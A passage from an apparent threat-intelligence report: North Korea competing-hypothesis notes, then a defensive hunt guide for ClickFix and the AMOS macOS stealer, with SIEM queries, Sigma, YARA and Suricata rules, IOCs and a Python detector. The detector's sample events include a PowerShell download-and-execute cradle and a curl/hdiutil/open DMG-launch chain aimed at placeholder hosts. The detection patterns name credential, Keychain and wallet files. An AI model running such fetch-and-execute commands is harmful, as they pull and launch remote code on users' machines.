- New primary-source reporting that directly contradicts the primary assessment
- Convergent coverage of the alternative view from at least two independent Tier 1–2 sources
- Public statement, indictment, or vendor advisory naming the alternative as authoritative
North Korea
Question 1.
Primary assessment. What is the accurate scale of the Bybit theft: $1.46 billion or $1.5 billion?
Alternative hypothesis. View A: FBI IC3 PSA [3] states 'approximately $1.5 billion' — the official government attribution figure. | View B: CyberScoop [4] reports '$1.46B' based on market valuations at time of reporting. The Wilson Center [5] says 'more than $1.5 billion.'
Indicators that would shift assessment:
- New primary-source reporting that directly contradicts the primary assessment
- Convergent coverage of the alternative view from at least two independent Tier 1–2 sources
- Public statement, indictment, or vendor advisory naming the alternative as authoritative
Question 2.
Primary assessment. Are DPRK financial theft operations and supply chain compromise converging into a unified strategy or operating as separate tracks?
Alternative hypothesis. View A: The Red Sheep Assessment argues they are converging, citing the Bybit attack path through Safe{Wallet} [5], Contagious Interview's targeting of developer environments [9], and npm package poisoning at scale [10]. | View B: The conventional framing, acknowledged by the briefing, treats these as separate threat categories. Financial theft (Lazarus/TraderTraitor) and developer supply chain compromise (Contagious Interview/Famous Chollima) may operate under different RGB sub-units with different objectives. No source explicitly confirms organizational or strategic convergence.
Indicators that would shift assessment:
- New primary-source reporting that directly contradicts the primary assessment
- Convergent coverage of the alternative view from at least two independent Tier 1–2 sources
- Public statement, indictment, or vendor advisory naming the alternative as authoritative
Question 3.
Primary assessment. Does the US National Security Strategy omission of North Korea signal reduced attention or is it a deliberate strategic choice?
Alternative hypothesis. View A: The omission signals to Pyongyang that its cyber operations face reduced strategic-level attention, potentially emboldening further operations [30]. This is the briefing's framing. | View B: The omission could reflect a deliberate strategy to avoid elevating North Korea's status or could signal that the administration plans to address DPRK through the China relationship rather than directly. Source [27] notes Trump remains 'positive about dialogue' with Kim, suggesting engagement rather than neglect.
Indicators that would shift assessment:
- New primary-source reporting that directly contradicts the primary assessment
- Convergent coverage of the alternative view from at least two independent Tier 1–2 sources
- Public statement, indictment, or vendor advisory naming the alternative as authoritative
Question 4.
Primary assessment. Is Russian technology transfer to DPRK producing immediate offensive cyber/EW capability or is it a future risk?
Alternative hypothesis. View A: Technology transfer is already underway and producing results: 3,000 soldiers returned with hands-on experience [24], $5.6-9.8B in Russian capital flowing to DPRK defense industry [25], and the 9th Party Congress formalized EW/AI as priorities [21]. Supported by the Red Sheep Assessment. | View B: Most analysis frames Russian technology transfer as a future risk rather than a current capability. The Lowy Institute [22] notes the EW/AI emphasis 'may stem from' battlefield experience — hedged language suggesting the causal chain is not yet confirmed. Combat experience in drone/artillery operations does not necessarily translate to offensive cyber or EW capability development.
Indicators that would shift assessment:
- New primary-source reporting that directly contradicts the primary assessment
- Convergent coverage of the alternative view from at least two independent Tier 1–2 sources
- Public statement, indictment, or vendor advisory naming the alternative as authoritative
Hunt Guide: ClickFix Social Engineering Campaign — macOS AMOS Stealer and Windows Execution Paths
Attribution: Detection logic below credits its original author. Rules adapted, ported, or quoted from a public source retain that source's author (e.g. SigmaHQ / Florian Roth, Elastic, Emerging Threats, Abuse.ch, or the cited vendor/researcher). Only rules explicitly marked RedSheep Security/Stone (original) were authored in-house. If you reuse a rule, preserve its stated attribution.
Hypothesis: If ClickFix social engineering campaigns are active against our environment, we expect to observe (1) explorer.exe spawning powershell.exe, cmd.exe, mshta.exe, or WindowsTerminal.exe via the Win+R Run dialog path on Windows endpoints, (2) Terminal.app or iTerm spawning curl, hdiutil, or open commands on macOS endpoints, (3) DNS queries to known staging/C2 domains (svs-verificationdate[.]beer, fewfwfwfwfwf[.]info), and (4) DMG mount events from Terminal on macOS in Sysmon, EDR process telemetry, DNS logs, and macOS unified logs.
Intelligence Summary: ClickFix is a cross-platform social engineering technique where fake CAPTCHAs, browser errors, or verification prompts instruct users to open a system utility and paste attacker-supplied clipboard contents. A newly reported macOS variant (June 2026, Unit 42) silently downloads and mounts malicious DMGs to deploy the AMOS/Odyssey infostealer targeting browser credentials, cryptocurrency wallets, and Apple Keychain data. The technique has been adopted by both criminal operators and state-sponsored groups (TA427/North Korea, TA450/Iran, TA422/Russia), representing a significant cross-platform initial access method that bypasses most endpoint controls by turning the user into the execution engine.
Confidence: High | Priority: High
Scope
- Networks: All enterprise endpoints (Windows and macOS), with emphasis on segments containing user workstations with browser access. Include VPN-connected remote endpoints and BYOD macOS devices. Prioritize networks with users who handle cryptocurrency, financial data, or have administrative privileges.
- Timeframe: Initial IOC sweep: 90 days retrospective from June 25, 2026. Behavioral hunt: 30 days retrospective, with ongoing monitoring. The Unit 42 disclosure was June 20, 2026, but the technique has been active since mid-2024 — extend retrospective lookback if initial findings warrant.
- Priority Systems: macOS endpoints (highest priority for this campaign variant), developer workstations, endpoints used for cryptocurrency operations, endpoints with access to financial systems, executive/leadership endpoints, endpoints of users in roles targeted by TA427/TA450 (policy, diplomacy, defense). Windows endpoints in environments where Run dialog and PowerShell are not restricted.
MITRE ATT&CK Techniques
T1204.002 — User Execution: Malicious File (Execution) [P2]
ClickFix relies on the victim manually opening Terminal (macOS) or Run dialog (Windows) and pasting attacker-supplied commands. The user is the execution engine — no exploit or dropper is needed. On macOS, the pasted command downloads and mounts a DMG containing the AMOS stealer. On Windows, the user pastes PowerShell or mshta commands into the Run dialog.
Splunk SPL:
index=sysmon EventCode=1 (Image="*\\powershell.exe" OR Image="*\\pwsh.exe" OR Image="*\\cmd.exe" OR Image="*\\mshta.exe" OR Image="*\\WindowsTerminal.exe") ParentImage="*\\explorer.exe" | eval risk_score=case(like(CommandLine,"%Invoke-WebRequest%"),90, like(CommandLine,"%IEX%"),95, like(CommandLine,"%DownloadString%"),95, like(CommandLine,"%http%"),80, 1=1,70) | where risk_score>=70 | table _time, ComputerName, User, ParentImage, Image, CommandLine, risk_score | sort -risk_score
Elastic KQL:
process.parent.name:"explorer.exe" AND process.name:("powershell.exe" OR "pwsh.exe" OR "cmd.exe" OR "mshta.exe" OR "WindowsTerminal.exe") AND event.action:"start"
Sigma Rule:
title: ClickFix - Suspicious Process Spawned from Explorer via Run Dialog
id: a1b2c3d4-e5f6-7890-abcd-ef1234567890
status: experimental
author: RedSheep Security/Stone
date: 2026/06/25
description: Detects processes commonly abused by ClickFix campaigns spawned from explorer.exe, indicating potential Win+R Run dialog abuse where the user pastes attacker-supplied commands.
references:
    - https://www.bleepingcomputer.com/news/security/new-macos-clickfix-attack-silently-mounts-dmgs-to-push-infostealer/
    - https://www.proofpoint.com/us/blog/threat-insight/clipboard-compromise-powershell-self-pwn
logsource:
    category: process_creation
    product: windows
detection:
    selection_parent:
        ParentImage|endswith: '\explorer.exe'
    selection_child:
        Image|endswith:
            - '\powershell.exe'
            - '\pwsh.exe'
            - '\cmd.exe'
            - '\mshta.exe'
            - '\WindowsTerminal.exe'
    condition: selection_parent and selection_child
falsepositives:
    - Legitimate use of Win+R to launch command-line utilities by administrators
    - IT automation tools that spawn processes via explorer.exe
level: high
tags:
    - attack.execution
    - attack.t1204.002
    - attack.t1059.001
Attribution: RedSheep Security/Stone (original)
High-value behavioral detection. Expect false positives from IT administrators who use Win+R for legitimate administrative tasks. Tune by excluding known admin accounts or known legitimate command patterns. Combine with CommandLine analysis for higher fidelity — look for web download cradles (Invoke-WebRequest, curl, wget), encoded commands (-enc, -e), or mshta with URLs.
T1059.001 — Command and Scripting Interpreter: PowerShell (Execution) [P1]
The primary Windows execution path for ClickFix. Attacker JavaScript silently writes a PowerShell download cradle or encoded command to the victim's clipboard. The victim pastes it into the Run dialog or PowerShell terminal. Commands often include Invoke-WebRequest, IEX(New-Object Net.WebClient).DownloadString(), or Base64-encoded payloads. Some campaigns use comment padding to hide malicious content beyond the visible area of the Run dialog.
Splunk SPL:
index=windows sourcetype="WinEventLog:Microsoft-Windows-PowerShell/Operational" EventCode=4104 | where match(ScriptBlockText, "(?i)(Invoke-WebRequest|IEX|DownloadString|DownloadFile|Start-BitsTransfer|Invoke-Expression|Net\.WebClient|webclient|http|base64)") | eval suspicious_length=len(ScriptBlockText) | where suspicious_length > 200 | table _time, ComputerName, UserID, ScriptBlockText, suspicious_length | sort -_time
Elastic KQL:
event.code:"4104" AND powershell.file.script_block_text:(*Invoke-WebRequest* OR *IEX* OR *DownloadString* OR *DownloadFile* OR *Net.WebClient* OR *base64* OR *Start-BitsTransfer*)
Sigma Rule:
title: ClickFix - PowerShell Download Cradle from Explorer Parent
id: b2c3d4e5-f6a7-8901-bcde-f23456789012
status: experimental
author: RedSheep Security/Stone
date: 2026/06/25
description: Detects PowerShell processes spawned by explorer.exe (Win+R path) containing download cradle patterns commonly used in ClickFix campaigns.
references:
    - https://www.proofpoint.com/us/blog/threat-insight/clipboard-compromise-powershell-self-pwn
logsource:
    category: process_creation
    product: windows
detection:
    selection_parent:
        ParentImage|endswith: '\explorer.exe'
    selection_process:
        Image|endswith:
            - '\powershell.exe'
            - '\pwsh.exe'
    selection_cmdline:
        CommandLine|contains:
            - 'Invoke-WebRequest'
            - 'IEX'
            - 'DownloadString'
            - 'DownloadFile'
            - 'Net.WebClient'
            - 'Start-BitsTransfer'
            - '-enc '
            - '-EncodedCommand'
            - 'FromBase64String'
    condition: selection_parent and selection_process and selection_cmdline
falsepositives:
    - Legitimate admin scripts launched from Run dialog
level: critical
tags:
    - attack.execution
    - attack.t1059.001
Attribution: RedSheep Security/Stone (original)
Critical detection. The combination of explorer.exe parent + PowerShell + download cradle is highly indicative of ClickFix. Base64-encoded commands are especially suspicious when launched from explorer.exe. Consider also monitoring for very long command lines (>500 characters) from explorer.exe child processes, as ClickFix payloads often use padding/comments to hide content.
T1059.004 — Command and Scripting Interpreter: Unix Shell (Execution) [P2]
The macOS ClickFix variant instructs users to open Terminal.app and paste a command that uses native macOS utilities (curl for download, hdiutil for silent DMG mounting, open for app launch). The command chain downloads a DMG, mounts it silently, locates the .app bundle inside, and launches it — all from a single pasted command.
Splunk SPL:
index=macos_edr (process_name="curl" OR process_name="hdiutil" OR process_name="open") (parent_process_name="*Terminal*" OR parent_process_name="*iTerm*") | transaction host maxspan=60s | where mvcount(process_name)>=2 AND isnotnull(mvfind(process_name,"curl")) AND isnotnull(mvfind(process_name,"hdiutil")) | table _time, host, user, parent_process_name, process_name, command_line
Elastic KQL:
process.parent.name:(*Terminal* OR *iTerm*) AND process.name:("curl" OR "hdiutil" OR "open") AND event.action:"exec"
Sigma Rule:
title: ClickFix macOS - Terminal Spawns Curl and Hdiutil for DMG Download and Mount
id: c3d4e5f6-a7b8-9012-cdef-345678901234
status: experimental
author: RedSheep Security/Stone
date: 2026/06/25
description: Detects the macOS ClickFix attack pattern where Terminal spawns curl to download a DMG file followed by hdiutil to mount it. This matches the Unit 42 reported campaign where fake CAPTCHA pages instruct victims to paste commands that silently download and mount malicious disk images.
references:
    - https://www.bleepingcomputer.com/news/security/new-macos-clickfix-attack-silently-mounts-dmgs-to-push-infostealer/
    - https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2026-06-20-ClickFix-campaign-delivers-macOS-infostealer-via-DMG.txt
logsource:
    category: process_creation
    product: macos
detection:
    selection_parent:
        ParentImage|contains:
            - 'Terminal'
            - 'iTerm'
    selection_hdiutil:
        Image|endswith: '/hdiutil'
        CommandLine|contains: 'attach'
    condition: selection_parent and selection_hdiutil
falsepositives:
    - Developers manually mounting DMG files from Terminal for legitimate software installation
    - IT automation scripts that use hdiutil
level: high
tags:
    - attack.execution
    - attack.t1059.004
Attribution: RedSheep Security/Stone (original)
On macOS, focus on the sequence: curl download → hdiutil attach → open .app. Legitimate developers may use hdiutil from Terminal, but the combination with curl downloading from external domains is unusual. Enrich with DNS data to check if the download domain is newly registered or has a suspicious TLD.
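As an added example (not part of this hunt guide and not any vendor's code), the following Python script implements both process-lineage detections described above over constructed sample events: the Windows explorer.exe → shell download-cradle scoring from T1059.001 and the macOS Terminal → curl → hdiutil attach → open sequence correlation from T1059.004. The event schema (ts, host, platform, parent, image, cmdline) and all hostnames and URLs in the sample are assumptions made for this example, not an EDR's real field names or real indicators.

```python
"""ClickFix process-lineage detector. Added example, not the hunt guide's own code.
Windows: explorer.exe spawning a shell, scored by download-cradle content (T1059.001).
macOS: Terminal/iTerm spawning curl -> hdiutil attach -> open within 60 s (T1059.004).
The event schema and every host/URL below are assumptions made for this example."""
import re
from dataclasses import dataclass
from typing import Dict, List


@dataclass
class ProcEvent:
    ts: float      # seconds since an arbitrary epoch
    host: str
    platform: str  # "windows" or "macos"
    parent: str    # parent process image (basename)
    image: str     # process image (basename)
    cmdline: str


# Windows: Run-dialog launch of a shell, scored like the SPL case() in the guide.
WINDOWS_SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "windowsterminal.exe"}
CRADLE_PATTERNS = [  # (pattern, score); the highest matching score wins
    (re.compile(r"\bIEX\b|Invoke-Expression", re.I), 95),
    (re.compile(r"DownloadString|DownloadFile|Net\.WebClient", re.I), 95),
    (re.compile(r"Invoke-WebRequest|\biwr\b|Start-BitsTransfer", re.I), 90),
    (re.compile(r"-enc(odedcommand)?\s|FromBase64String", re.I), 90),
    (re.compile(r"https?://", re.I), 80),
]
LONG_CMDLINE = 500  # padded payloads hide their tail beyond the Run dialog's visible width


def score_windows_event(ev: ProcEvent) -> int:
    """Risk score for one Windows process-creation event; 0 means the rule does not fire."""
    if ev.platform != "windows" or ev.parent.lower() != "explorer.exe":
        return 0
    if ev.image.lower() not in WINDOWS_SHELLS:
        return 0
    score = 70  # baseline: any shell launched via Win+R is worth a look
    for pattern, pattern_score in CRADLE_PATTERNS:
        if pattern.search(ev.cmdline):
            score = max(score, pattern_score)
    if len(ev.cmdline) > LONG_CMDLINE:
        score = min(100, score + 5)
    return score


# macOS: curl -> hdiutil attach -> open from a terminal parent, correlated per host.
MAC_TERMINALS = ("terminal", "iterm")
MAC_STAGES = ["curl", "hdiutil", "open"]


def find_macos_chains(events: List[ProcEvent], window: float = 60.0) -> List[Dict]:
    """One finding per curl launch that is followed by hdiutil attach within `window` seconds."""
    candidates: Dict[str, List[ProcEvent]] = {}
    for ev in sorted(events, key=lambda e: e.ts):
        if ev.platform != "macos" or ev.image not in MAC_STAGES:
            continue
        if not any(t in ev.parent.lower() for t in MAC_TERMINALS):
            continue
        if ev.image == "hdiutil" and "attach" not in ev.cmdline:
            continue  # detach/info/verify are not the mount step we care about
        candidates.setdefault(ev.host, []).append(ev)

    findings = []
    for host, evs in candidates.items():
        for i, start in enumerate(evs):
            if start.image != "curl":
                continue
            chain = {"curl": start}
            for later in evs[i + 1:]:
                if later.ts - start.ts > window:
                    break  # events are time-sorted, so nothing later can be in the window
                chain.setdefault(later.image, later)
            if "hdiutil" not in chain:
                continue  # a download with no mount is not the ClickFix pattern
            url = re.search(r"https?://\S+", start.cmdline)
            findings.append({
                "host": host,
                "stages": [s for s in MAC_STAGES if s in chain],
                "download_url": url.group(0) if url else None,
                "complete": all(s in chain for s in MAC_STAGES),
            })
    return findings


# Constructed sample telemetry; hostnames and URLs are placeholders, not real indicators.
SAMPLE_EVENTS = [
    ProcEvent(1.0, "WIN-01", "windows", "explorer.exe", "powershell.exe",
              "powershell -c \"IEX (New-Object Net.WebClient).DownloadString('http://lure.example.test/v')\""),
    ProcEvent(2.0, "WIN-02", "windows", "explorer.exe", "powershell.exe", "powershell.exe"),  # admin, no args
    ProcEvent(3.0, "WIN-03", "windows", "svchost.exe", "powershell.exe", "powershell -File C:\\scripts\\inv.ps1"),
    ProcEvent(10.0, "MAC-01", "macos", "Terminal", "curl", "curl -sL -o /tmp/v.dmg https://staging.example.test/v.dmg"),
    ProcEvent(14.0, "MAC-01", "macos", "Terminal", "hdiutil", "hdiutil attach /tmp/v.dmg"),
    ProcEvent(18.0, "MAC-01", "macos", "Terminal", "open", "open /Volumes/v/v.app"),
    ProcEvent(100.0, "MAC-02", "macos", "iTerm2", "curl", "curl -O https://vendor.example.test/tool.dmg"),
    ProcEvent(5000.0, "MAC-02", "macos", "iTerm2", "hdiutil", "hdiutil attach tool.dmg"),  # hours later
]


def run(events: List[ProcEvent] = SAMPLE_EVENTS) -> Dict:
    """Apply both detections; Windows hits are (host, score) pairs with score >= 70."""
    windows = [(e.host, score_windows_event(e)) for e in events if score_windows_event(e) >= 70]
    return {"windows": windows, "macos": find_macos_chains(events)}
```

On the sample, the developer on MAC-02 who mounts a DMG hours after downloading it does not produce a finding, while the 60-second curl → hdiutil attach → open sequence on MAC-01 is reported as a complete chain with the download URL extracted for DNS enrichment.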
T1115 — Clipboard Data (Collection) [P2]
ClickFix uses JavaScript clipboard injection (navigator.clipboard.writeText() or document.execCommand('copy')) to silently load malicious commands into the victim's clipboard. The victim then pastes these commands into Terminal or Run dialog. Note: T1115 formally covers clipboard data collection; ClickFix uses clipboard writing/injection, which is the closest available ATT&CK mapping.
Splunk SPL:
index=proxy (uri_path="*captcha*" OR uri_path="*verify*" OR uri_path="*check*") (dest_host="*.beer" OR dest_host="*.top" OR dest_host="*.xyz" OR dest_host="*.info") | stats count by src_ip, dest_host, uri_path, http_user_agent | table src_ip, dest_host, uri_path, http_user_agent, count
Elastic KQL:
url.path:(*captcha* OR *verify* OR *check*) AND url.domain:(*beer OR *top OR *xyz OR *info)
Sigma Rule:
title: ClickFix - MSHTA Execution from Explorer Parent Process
id: d4e5f6a7-b8c9-0123-defa-456789012345
status: experimental
author: RedSheep Security/Stone
date: 2026/06/25
description: Detects mshta.exe spawned from explorer.exe, a known ClickFix Windows execution path where clipboard-injected mshta commands are pasted into the Run dialog.
references:
    - https://www.proofpoint.com/us/blog/threat-insight/clipboard-compromise-powershell-self-pwn
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith: '\explorer.exe'
        Image|endswith: '\mshta.exe'
    condition: selection
falsepositives:
    - Rare legitimate use of mshta.exe from Run dialog
level: critical
tags:
    - attack.execution
    - attack.defense_evasion
    - attack.t1218.005
Attribution: RedSheep Security/Stone (original)
Clipboard injection is difficult to detect at the endpoint level. Focus on proxy/DNS detections for fake CAPTCHA pages and process lineage detections as downstream indicators. Some EDRs (CrowdStrike, SentinelOne) may be able to log clipboard API calls from browser processes — check vendor-specific capabilities.
T1555 — Credentials from Password Stores (Credential Access) [P2]
The AMOS/Odyssey stealer payload targets Apple Keychain data, browser stored credentials, and cryptocurrency wallet data. On macOS, this involves reading Keychain databases, browser profile directories (Chrome, Firefox, Safari), and crypto wallet application data. The malware also replaces legitimate cryptocurrency wallet applications with trojanized versions.
Splunk SPL:
index=macos_edr (file_path="*Keychain*" OR file_path="*Chrome/Default/Login Data*" OR file_path="*Firefox/Profiles*" OR file_path="*wallet*" OR file_path="*exodus*" OR file_path="*metamask*" OR file_path="*phantom*" OR file_path="*coinbase*") process_name!="Safari" process_name!="Chrome" process_name!="Firefox" process_name!="Google Chrome" | stats count by host, user, process_name, file_path | table host, user, process_name, file_path, count
Elastic KQL:
file.path:(*Keychain* OR *Login\ Data* OR *Firefox\/Profiles* OR *wallet* OR *exodus* OR *metamask*) AND NOT process.name:("Safari" OR "Chrome" OR "Firefox" OR "Google Chrome")
Sigma Rule:
title: AMOS Stealer - Suspicious Access to Browser Credential and Wallet Files on macOS
id: e5f6a7b8-c9d0-1234-efab-567890123456
status: experimental
author: RedSheep Security/Stone
date: 2026/06/25
description: Detects non-browser processes accessing browser credential stores, Apple Keychain, or cryptocurrency wallet data — indicators of AMOS/Odyssey infostealer activity.
references:
    - https://www.bleepingcomputer.com/news/security/new-macos-clickfix-attack-silently-mounts-dmgs-to-push-infostealer/
logsource:
    category: file_access
    product: macos
detection:
    selection_files:
        TargetFilename|contains:
            - 'Keychain'
            - 'Login Data'
            - 'cookies.sqlite'
            - 'logins.json'
            - 'wallet'
            - 'exodus'
            - 'metamask'
    filter_browsers:
        Image|contains:
            - 'Safari'
            - 'Chrome'
            - 'Firefox'
            - 'Brave'
            - 'Edge'
    condition: selection_files and not filter_browsers
falsepositives:
    - Legitimate backup or synchronization tools accessing browser profiles
    - Security scanning tools
level: high
tags:
    - attack.credential_access
    - attack.t1555
Attribution: RedSheep Security/Stone (original)
This detection focuses on the credential/wallet harvesting behavior of AMOS stealer. On macOS, look for unauthorized processes reading Keychain databases or browser profile directories. Also monitor for crypto wallet .app bundles being replaced or modified, which indicates the trojanization behavior reported by Microsoft.
T1041 — Exfiltration Over C2 Channel (Exfiltration) [P1]
The AMOS/Odyssey stealer exfiltrates collected credentials, wallet data, Keychain data, and documents to attacker-controlled C2 infrastructure. Reported C2 server is 196.251.107[.]171 on port 3000, with domain fewfwfwfwfwf[.]info used for C2 communications.
Splunk SPL:
(index=firewall OR index=proxy) (dest_ip="196.251.107.171" OR dest="196.251.107.171" OR dest_ip="178.16.52.101" OR dest="178.16.52.101") | stats count earliest(_time) as first_seen latest(_time) as last_seen values(src_ip) as source_ips values(dest_port) as dest_ports by dest_ip | table dest_ip, source_ips, dest_ports, count, first_seen, last_seen
Elastic KQL:
destination.ip:("196.251.107.171" OR "178.16.52.101") OR dns.question.name:("svs-verificationdate.beer" OR "fewfwfwfwfwf.info")
Sigma Rule:
title: ClickFix macOS Campaign - Known C2 Communication
id: f6a7b8c9-d0e1-2345-fabc-678901234567
status: experimental
author: RedSheep Security/Stone
date: 2026/06/25
description: Detects network connections to known C2 infrastructure associated with the macOS ClickFix AMOS stealer campaign reported by Unit 42.
references:
    - https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2026-06-20-ClickFix-campaign-delivers-macOS-infostealer-via-DMG.txt
logsource:
    category: network_connection
    product: any
detection:
    selection_ip:
        DestinationIp:
            - '196.251.107.171'
            - '178.16.52.101'
    selection_domain:
        DestinationHostname|contains:
            - 'svs-verificationdate.beer'
            - 'fewfwfwfwfwf.info'
    condition: selection_ip or selection_domain
falsepositives:
    - Unlikely — these are known malicious indicators
level: critical
tags:
    - attack.command_and_control
    - attack.exfiltration
    - attack.t1041
Attribution: RedSheep Security/Stone (original)
Direct IOC match — any hit should be treated as P1 and immediately investigated. Note the C2 server uses port 3000, which is unusual and may stand out in network traffic analysis. Also monitor for outbound connections to unusual ports from macOS hosts.
T1539 — Steal Web Session Cookie (Credential Access) [P2]
AMOS stealer harvests browser session cookies from Chrome, Firefox, Safari and other browsers to enable session hijacking of active web sessions.
Splunk SPL:
index=sysmon EventCode=11 (TargetFilename="*Cookies*" OR TargetFilename="*cookies.sqlite*" OR TargetFilename="*Cookie*") | where NOT match(Image, "(?i)(chrome|firefox|safari|brave|edge|msedge)") | stats count by ComputerName, User, Image, TargetFilename | table ComputerName, User, Image, TargetFilename, count
Elastic KQL:
file.path:(*Cookies* OR *cookies.sqlite*) AND NOT process.name:("chrome" OR "firefox" OR "safari" OR "msedge" OR "brave")
Cookie theft is a secondary indicator. Focus on non-browser processes accessing cookie stores. Combine with process lineage data to correlate with ClickFix execution chain.
T1005 — Data from Local System (Collection) [P3]
AMOS stealer harvests user documents, messaging app data, and other local files of interest. The malware performs broad data collection from the user's home directory.
Splunk SPL:
index=macos_edr event_type="file_read" (file_path="*/Documents/*" OR file_path="*/Desktop/*" OR file_path="*/Downloads/*") | stats dc(file_path) as files_accessed count by host, user, process_name, process_path | where files_accessed > 50 | sort -files_accessed | table host, user, process_name, process_path, files_accessed, count
Elastic KQL:
event.action:"open" AND file.path:(*Documents* OR *Desktop* OR *Downloads*) AND event.category:"file"
Broad file collection generates noise. Focus on processes accessing a high volume of files across multiple sensitive directories in a short timeframe, especially from unsigned or unknown processes on macOS.
Indicators of Compromise
| Type | Value | Context |
|---|---|---|
| domain | svs-verificationdate[.]beer | DMG download and staging server for macOS AMOS ClickFix campaign. Used to host the malicious disk image that deploys the AMOS/Odyssey infostealer. |
| domain | fewfwfwfwfwf[.]info | C2 domain for the macOS AMOS ClickFix campaign. Used for command-and-control communications and data exfiltration. |
| ip | 178.16.52.101 | Hosting IP address for svs-verificationdate[.]beer, the DMG staging server for the macOS AMOS ClickFix campaign. |
| ip | 196.251.107.171 | C2 server (port 3000) for the macOS AMOS ClickFix campaign. Used for exfiltration of stolen credentials, wallet data, and Keychain information. |
| hash_sha256 | f0038a5f46720da5982b6984ceef10cf99359432e102b12a0b0657498d36f670 | URL path hash value observed on svs-verificationdate[.]beer. May serve as a file identifier for the DMG payload, though not confirmed as a standalone file hash by Unit 42. |
IOC Sweep Queries (Splunk):
index=dns (query="*svs-verificationdate.beer*" OR query="*svs-verificationdate*") | stats count earliest(_time) as first_seen latest(_time) as last_seen values(src_ip) as source_ips by query | table query, source_ips, count, first_seen, last_seen
index=dns (query="*fewfwfwfwfwf.info*" OR query="*fewfwfwfwfwf*") | stats count earliest(_time) as first_seen latest(_time) as last_seen values(src_ip) as source_ips by query | table query, source_ips, count, first_seen, last_seen
(index=firewall OR index=proxy OR index=dns) (dest_ip="178.16.52.101" OR dest="178.16.52.101" OR answer="178.16.52.101") | stats count earliest(_time) as first_seen latest(_time) as last_seen values(src_ip) as source_ips values(dest_port) as dest_ports by dest_ip | table dest_ip, source_ips, dest_ports, count, first_seen, last_seen
(index=firewall OR index=proxy OR index=dns) (dest_ip="196.251.107.171" OR dest="196.251.107.171" OR answer="196.251.107.171") | stats count earliest(_time) as first_seen latest(_time) as last_seen values(src_ip) as source_ips values(dest_port) as dest_ports by dest_ip | table dest_ip, source_ips, dest_ports, count, first_seen, last_seen
(index=proxy OR index=sysmon OR index=edr) ("f0038a5f46720da5982b6984ceef10cf99359432e102b12a0b0657498d36f670") | stats count earliest(_time) as first_seen latest(_time) as last_seen values(src_ip) as source_ips by sourcetype | table sourcetype, source_ips, count, first_seen, last_seen
YARA Rules
clickfix_macos_amos_stealer_indicators — Detects indicators of the AMOS/Odyssey macOS stealer deployed via ClickFix campaigns, including known C2 domains, staging infrastructure, and characteristic command patterns used in the clipboard-injected payload.
rule clickfix_macos_amos_stealer_indicators {
    meta:
        author = "RedSheep Security/Stone"
        description = "Detects indicators associated with ClickFix macOS AMOS/Odyssey stealer campaign — C2 domains, staging infrastructure, and command patterns"
        reference = "https://www.bleepingcomputer.com/news/security/new-macos-clickfix-attack-silently-mounts-dmgs-to-push-infostealer/"
        date = "2026-06-25"
        threat_name = "AMOS/Odyssey Stealer via ClickFix"
    strings:
        $domain1 = "svs-verificationdate.beer" ascii wide nocase
        $domain2 = "fewfwfwfwfwf.info" ascii wide nocase
        $ip1 = "196.251.107.171" ascii wide
        $ip2 = "178.16.52.101" ascii wide
        $cmd_hdiutil = "hdiutil attach" ascii wide nocase
        $cmd_curl_dmg = ".dmg" ascii wide nocase
        $cmd_open_app = "open " ascii wide
        $hash_path = "f0038a5f46720da5982b6984ceef10cf99359432e102b12a0b0657498d36f670" ascii wide
        $keychain_access = "Keychain" ascii wide
        $wallet_exodus = "exodus" ascii wide nocase
        $wallet_metamask = "metamask" ascii wide nocase
    condition:
        any of ($domain1, $domain2, $ip1, $ip2, $hash_path) or
        (3 of ($cmd_hdiutil, $cmd_curl_dmg, $cmd_open_app, $keychain_access, $wallet_exodus, $wallet_metamask))
}
Attribution: RedSheep Security/Stone (original)
clickfix_clipboard_injection_html — Detects HTML/JavaScript pages used for ClickFix clipboard injection attacks — identifies fake CAPTCHA/verification pages that use clipboard write APIs to inject malicious commands.
rule clickfix_clipboard_injection_html {
    meta:
        author = "RedSheep Security/Stone"
        description = "Detects HTML pages using clipboard write APIs combined with social engineering text patterns characteristic of ClickFix attacks"
        reference = "https://www.proofpoint.com/us/blog/threat-insight/clipboard-compromise-powershell-self-pwn"
        date = "2026-06-25"
    strings:
        $clipboard_api1 = "navigator.clipboard.writeText" ascii wide nocase
        $clipboard_api2 = "document.execCommand('copy')" ascii wide nocase
        $clipboard_api3 = "document.execCommand(\"copy\")" ascii wide nocase
        $social_eng1 = "Win+R" ascii wide nocase
        $social_eng2 = "Ctrl+V" ascii wide nocase
        $social_eng3 = "paste" ascii wide nocase
        $social_eng4 = "Terminal" ascii wide nocase
        $social_eng5 = "verification" ascii wide nocase
        $social_eng6 = "captcha" ascii wide nocase
        $social_eng7 = "I am not a robot" ascii wide nocase
        $cmd_ps = "powershell" ascii wide nocase
        $cmd_mshta = "mshta" ascii wide nocase
        $cmd_curl = "curl" ascii wide nocase
        $cmd_hdiutil = "hdiutil" ascii wide nocase
    condition:
        filesize < 500KB and
        any of ($clipboard_api*) and
        2 of ($social_eng*) and
        any of ($cmd_*)
}
Attribution: RedSheep Security/Stone (original)
Suricata Rules
SID 2026001 — Detects DNS lookup for svs-verificationdate[.]beer — ClickFix macOS AMOS stealer staging domain
alert dns $HOME_NET any -> any 53 (msg:"ET TROJAN ClickFix AMOS Stealer Staging Domain (svs-verificationdate.beer)"; dns.query; content:"svs-verificationdate"; content:"beer"; distance:0; reference:url,www.bleepingcomputer.com/news/security/new-macos-clickfix-attack-silently-mounts-dmgs-to-push-infostealer/; classtype:trojan-activity; sid:2026001; rev:1; metadata:created_at 2026_06_25;)
Attribution: RedSheep Security/Stone (original)
SID 2026002 — Detects DNS lookup for fewfwfwfwfwf[.]info — ClickFix macOS AMOS stealer C2 domain
alert dns $HOME_NET any -> any 53 (msg:"ET TROJAN ClickFix AMOS Stealer C2 Domain (fewfwfwfwfwf.info)"; dns.query; content:"fewfwfwfwfwf"; content:"info"; distance:0; reference:url,github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2026-06-20-ClickFix-campaign-delivers-macOS-infostealer-via-DMG.txt; classtype:trojan-activity; sid:2026002; rev:1; metadata:created_at 2026_06_25;)
Attribution: RedSheep Security/Stone (original)
SID 2026003 — Detects outbound TCP connection to 196.251.107.171 port 3000 — ClickFix AMOS stealer C2 server
